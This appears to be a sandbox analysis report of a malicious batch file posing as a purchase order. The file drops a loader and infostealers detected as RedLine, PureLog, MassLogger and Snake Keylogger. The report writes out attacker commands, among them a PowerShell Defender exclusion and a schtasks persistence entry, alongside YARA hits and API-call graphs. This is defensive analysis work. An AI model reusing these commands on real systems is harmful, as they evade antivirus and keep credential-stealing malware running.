                                                                                                                                    2025-01-09 18:09:58 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                    Statistics

                                                                                                                                    CPU Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    Memory Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    High Level Behavior Distribution

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Behavior

                                                                                                                                    Click to jump to process

                                                                                                                                    System Behavior

                                                                                                                                    General

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:13:09:22
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#3_RKG367.bat" "
                                                                                                                                    Imagebase:0x7ff6a5f10000
                                                                                                                                    File size:289'792 bytes
                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:1
                                                                                                                                    Start time:13:09:22
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:13:09:44
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\System32\findstr.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:findstr /e "'v" "C:\Users\user\Desktop\PO#3_RKG367.bat"
                                                                                                                                    Imagebase:0x7ff7bc380000
                                                                                                                                    File size:36'352 bytes
                                                                                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:5
                                                                                                                                    Start time:13:09:44
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\System32\cscript.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
                                                                                                                                    Imagebase:0x7ff7eaac0000
                                                                                                                                    File size:161'280 bytes
                                                                                                                                    MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:6
                                                                                                                                    Start time:13:09:45
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:1'317'376 bytes
                                                                                                                                    MD5 hash:E337ECD5680D121D6DD649956DC716CA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000006.00000002.2536406675.000000007FAA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000006.00000002.2464206701.0000000002266000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                    • Detection: 47%, ReversingLabs
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:8
                                                                                                                                    Start time:13:09:50
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                    Imagebase:0x1c0000
                                                                                                                                    File size:236'544 bytes
                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:9
                                                                                                                                    Start time:13:09:51
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:10
                                                                                                                                    Start time:13:09:51
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:175'800 bytes
                                                                                                                                    MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000003.2448553311.000000002D0DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                    • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000001.2446233147.00000000013E0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 3%, ReversingLabs
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:12
                                                                                                                                    Start time:13:09:54
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                    Imagebase:0x780000
                                                                                                                                    File size:70'656 bytes
                                                                                                                                    MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                    • Detection: 79%, ReversingLabs
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:13
                                                                                                                                    Start time:13:09:54
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                                                                                                                                    Imagebase:0x350000
                                                                                                                                    File size:98'816 bytes
                                                                                                                                    MD5 hash:F6B8018A27BCDBAA35778849B586D31B
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4634725765.000000000269F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, Author: unknown
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4634725765.0000000002794000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown
                                                                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                    • Detection: 91%, ReversingLabs
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:14
                                                                                                                                    Start time:13:09:56
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                                    Imagebase:0xe70000
                                                                                                                                    File size:433'152 bytes
                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:15
                                                                                                                                    Start time:13:09:56
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:16
                                                                                                                                    Start time:13:09:56
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                    Imagebase:0x320000
                                                                                                                                    File size:187'904 bytes
                                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:17
                                                                                                                                    Start time:13:09:56
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:18
                                                                                                                                    Start time:13:10:01
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                    Imagebase:0x7ff717f30000
                                                                                                                                    File size:496'640 bytes
                                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:21
                                                                                                                                    Start time:13:10:05
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Users\Public\Libraries\Oupzhkpr.PIF
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\Public\Libraries\Oupzhkpr.PIF"
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:1'317'376 bytes
                                                                                                                                    MD5 hash:E337ECD5680D121D6DD649956DC716CA
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                    • Detection: 47%, ReversingLabs
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:22
                                                                                                                                    Start time:13:10:06
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                    Imagebase:0x1c0000
                                                                                                                                    File size:236'544 bytes
                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:23
                                                                                                                                    Start time:13:10:06
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:24
                                                                                                                                    Start time:13:10:06
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:175'800 bytes
                                                                                                                                    MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.2745277954.0000000034B30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.2741756362.00000000343B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.2718853988.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000003.2609245491.000000002FFBA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.2740855997.0000000032F75000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:25
                                                                                                                                    Start time:13:10:20
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Users\Public\Libraries\Oupzhkpr.PIF
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\Public\Libraries\Oupzhkpr.PIF"
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:1'317'376 bytes
                                                                                                                                    MD5 hash:E337ECD5680D121D6DD649956DC716CA
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:26
                                                                                                                                    Start time:13:10:20
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                    Imagebase:0x7ff642ec0000
                                                                                                                                    File size:21'312 bytes
                                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:27
                                                                                                                                    Start time:13:10:22
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                    Imagebase:0x790000
                                                                                                                                    File size:236'544 bytes
                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:28
                                                                                                                                    Start time:13:10:22
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:29
                                                                                                                                    Start time:13:10:22
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:175'800 bytes
                                                                                                                                    MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001D.00000002.2840097800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001D.00000003.2772871636.00000000234E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001D.00000002.2871352037.0000000025380000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001D.00000001.2760141830.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001D.00000002.2881899810.0000000026485000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001D.00000002.2869962358.00000000250F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001D.00000002.2869415210.0000000024E93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:30
                                                                                                                                    Start time:13:10:41
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                                                                                                                                    Imagebase:0xf0000
                                                                                                                                    File size:665'670'656 bytes
                                                                                                                                    MD5 hash:10751439BD30D4B3066935F2DFFDC3C7
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                    Has exited:false

                                                                                                                                    Disassembly

                                                                                                                                    Reset < >

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:13.9%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:10.4%
                                                                                                                                      Total number of Nodes:289
                                                                                                                                      Total number of Limit Nodes:15
                                                                                                                                      execution_graph 26457 2c567c4 27274 2c3480c 26457->27274 27275 2c3481d 27274->27275 27276 2c34843 27275->27276 27277 2c3485a 27275->27277 27283 2c34b78 27276->27283 27292 2c34570 27277->27292 27280 2c3488b 27281 2c34850 27281->27280 27297 2c34500 27281->27297 27284 2c34b85 27283->27284 27291 2c34bb5 27283->27291 27286 2c34bae 27284->27286 27288 2c34b91 27284->27288 27289 2c34570 11 API calls 27286->27289 27287 2c34b9f 27287->27281 27303 2c32c44 11 API calls 27288->27303 27289->27291 27304 2c344ac 27291->27304 27293 2c34574 27292->27293 27294 2c34598 27292->27294 27317 2c32c10 27293->27317 27294->27281 27296 2c34581 27296->27281 27298 2c34504 27297->27298 27299 2c34514 27297->27299 27298->27299 27301 2c34570 11 API calls 27298->27301 27300 2c34542 27299->27300 27302 2c32c2c 11 API calls 27299->27302 27300->27280 27301->27299 27302->27300 27303->27287 27305 2c344cd 27304->27305 27306 2c344b2 27304->27306 27305->27287 27306->27305 27308 2c32c2c 27306->27308 27309 2c32c3a 27308->27309 27310 2c32c30 27308->27310 27309->27305 27310->27309 27312 2c32d19 27310->27312 27315 2c364cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 27310->27315 27316 2c32ce8 7 API calls 27312->27316 27314 2c32d3a 27314->27305 27315->27312 27316->27314 27318 2c32c14 27317->27318 27318->27296 27319 2c32c1e 27318->27319 27320 2c32d19 27318->27320 27324 2c364cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 27318->27324 27319->27296 27325 2c32ce8 7 API calls 27320->27325 27323 2c32d3a 27323->27296 27324->27320 27325->27323 27326 2c5bb44 27329 2c4ec74 27326->27329 27330 2c4ec7c 27329->27330 27330->27330 30348 2c4870c LoadLibraryW 27330->30348 27332 2c4ec9e 30353 2c32ee0 QueryPerformanceCounter 27332->30353 27334 2c4eca3 27335 2c4ecad InetIsOffline 27334->27335 27336 2c4ecb7 27335->27336 27337 2c4ecc8 27335->27337 27338 2c34500 11 API calls 27336->27338 27339 2c34500 11 API calls 27337->27339 27340 2c4ecc6 27338->27340 27339->27340 27341 2c3480c 11 API calls 27340->27341 27342 2c4ecf5 27341->27342 27343 2c4ecfd 27342->27343 30356 2c34798 27343->30356 27345 2c4ed20 27346 2c4ed28 27345->27346 27347 2c4ed32 27346->27347 30371 2c48824 27347->30371 27350 2c3480c 11 API calls 27351 2c4ed59 27350->27351 27352 2c4ed61 27351->27352 27353 2c34798 11 API calls 27352->27353 27354 2c4ed84 27353->27354 27355 2c4ed8c 27354->27355 30384 2c346a4 27355->30384 30386 2c480c8 30348->30386 30350 2c48745 30397 2c47d00 30350->30397 30354 2c32ef8 GetTickCount 30353->30354 30355 2c32eed 30353->30355 30354->27334 30355->27334 30357 2c347fd 30356->30357 30358 2c3479c 30356->30358 30359 2c34500 30358->30359 30360 2c347a4 30358->30360 30365 2c34570 11 API calls 30359->30365 30366 2c34514 30359->30366 30360->30357 30362 2c347b3 30360->30362 30364 2c34500 11 API calls 30360->30364 30361 2c34542 30361->27345 30363 2c34570 11 API calls 30362->30363 30368 2c347cd 30363->30368 30364->30362 30365->30366 30366->30361 30367 2c32c2c 11 API calls 30366->30367 30367->30361 30369 2c34500 11 API calls 30368->30369 30370 2c347f9 30369->30370 30370->27345 30372 2c48838 30371->30372 30373 2c48857 LoadLibraryA 30372->30373 30374 2c48867 30373->30374 30375 2c48020 17 API calls 30374->30375 30376 2c4886d 30375->30376 30377 2c480c8 15 API calls 30376->30377 30378 2c48886 30377->30378 30379 2c47d00 18 API calls 30378->30379 30380 2c488e5 FreeLibrary 30379->30380 30381 2c488fd 30380->30381 30382 2c344d0 11 API calls 30381->30382 30383 2c4890a 30382->30383 30383->27350 30385 2c346aa 30384->30385 30387 2c34500 11 API calls 30386->30387 30388 2c480ed 30387->30388 30411 2c47914 30388->30411 30391 2c34798 11 API calls 30392 2c48107 30391->30392 30393 2c4810f GetModuleHandleW GetProcAddress 